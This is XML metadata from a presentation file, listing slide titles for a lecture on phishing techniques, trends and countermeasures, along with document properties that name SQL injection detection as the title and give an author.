      <vt:lpstr>Phishing attack techniques (cont.)</vt:lpstr>
      <vt:lpstr>Phishing attack techniques (Spoofing URL)</vt:lpstr>
      <vt:lpstr>Phishing attack techniques (forging email header)</vt:lpstr>
      <vt:lpstr>An example of forge email header</vt:lpstr>
      <vt:lpstr>Phishing attack trend</vt:lpstr>
      <vt:lpstr>Phishing attack trend (cont.)</vt:lpstr>
      <vt:lpstr>Phishing attack trend (cont.)</vt:lpstr>
      <vt:lpstr>Anti-phishing techniques</vt:lpstr>
      <vt:lpstr>Fighting phishing attacks (browser-based)</vt:lpstr>
      <vt:lpstr>Fighting phishing attacks (IE warning)</vt:lpstr>
      <vt:lpstr>Fighting phishing attacks (information sharing)</vt:lpstr>
      <vt:lpstr>Fighting phishing attacks (information sharing)</vt:lpstr>
      <vt:lpstr>Fighting phishing attacks (DNS record)</vt:lpstr>
      <vt:lpstr>Fighting phishing attacks (WHOIS lookup example)</vt:lpstr>
      <vt:lpstr>Fighting phishing attacks (WHOIS lookup example)</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Fighting phishing attacks (legislation)</vt:lpstr>
      <vt:lpstr>How trusted websites are dealing with phishing?</vt:lpstr>
      <vt:lpstr>How trusted websites are dealing with phishing?</vt:lpstr>
      <vt:lpstr>How trusted websites are dealing with phishing?</vt:lpstr>
      <vt:lpstr>Summary</vt:lpstr>
      <vt:lpstr>References</vt:lpstr>
      <vt:lpstr>Types of Phishing</vt:lpstr>
      <vt:lpstr>Types of Phishing</vt:lpstr>
      <vt:lpstr>Types of Phishing</vt:lpstr>
      <vt:lpstr>Types of Phishing</vt:lpstr>
      <vt:lpstr>Types of Phishing</vt:lpstr>
      <vt:lpstr>Types of Phishing</vt:lpstr>
      <vt:lpstr>Causes of Phishing</vt:lpstr>
      <vt:lpstr>Effects of Phishing</vt:lpstr>
      <vt:lpstr>Industries affected</vt:lpstr>
      <vt:lpstr>Phishing Trends</vt:lpstr>
      <vt:lpstr>Phishing Trends</vt:lpstr>
      <vt:lpstr>How to combat phishing?</vt:lpstr>
      <vt:lpstr>How to combat phishing?</vt:lpstr>
      <vt:lpstr>How to combat phishing?</vt:lpstr>
      <vt:lpstr>How to combat phishing?</vt:lpstr>
      <vt:lpstr>How to combat phishing?</vt:lpstr>
      <vt:lpstr>How to combat phishing?</vt:lpstr>
      <vt:lpstr>How to combat phishing?</vt:lpstr>
      <vt:lpstr>How to combat phishing?</vt:lpstr>
      <vt:lpstr>How to combat phishing?</vt:lpstr>
      <vt:lpstr>Organizations </vt:lpstr>
      <vt:lpstr>What does all the above imply?</vt:lpstr>
      <vt:lpstr> References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Information-Theoretic Detection of SQL Injection Attacks</dc:title>
  <dc:creator>hshahria</dc:creator>
  <cp:lastModifiedBy>Hossain Shahriar</cp:lastModifiedBy>
  <cp:revision>493</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2006-08-16T00:00:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-07-01T15:39:55Z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